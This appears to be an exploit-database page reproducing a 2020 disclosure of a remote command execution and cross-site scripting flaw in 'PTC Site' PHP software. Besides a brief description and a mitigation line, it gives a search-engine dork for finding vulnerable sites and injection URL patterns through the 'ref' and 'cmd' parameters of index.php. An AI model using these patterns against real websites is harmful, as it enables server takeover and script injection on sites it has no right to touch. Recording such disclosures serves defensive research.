header-logo
Suggest Exploit
vendor:
PTC Site's RCE/XSS Vulnerability
by:
CrazyMember
8,8
CVSS
HIGH
RCE/XSS/HTML
79
CWE
Product Name: PTC Site's RCE/XSS Vulnerability
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PTC Site’s RCE/XSS Vulnerability

The vulnerability exists in the 'view=help' parameter of the 'index.php' file. An attacker can inject malicious code into the 'ref' parameter, which can be used to execute arbitrary commands or inject malicious scripts into the vulnerable website.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any application logic.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Title: PTC Site's RCE/XSS Vulnerability
@Vendor: http://www.ptcsites4sale.info & and etc...:D
@Author: CrazyMember
@SPC Thanks: XroGuE 4 r3p0r7 :P 
@Dork:"intext:Warning: passthru()" "inurl:view=help"

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]

Demo: 

#http://[site]/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Commond]
#http://[site]/index.php?view=help&faq=1&ref=[Your ScripT]

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Navigation

Suggest Exploit

Services By CQR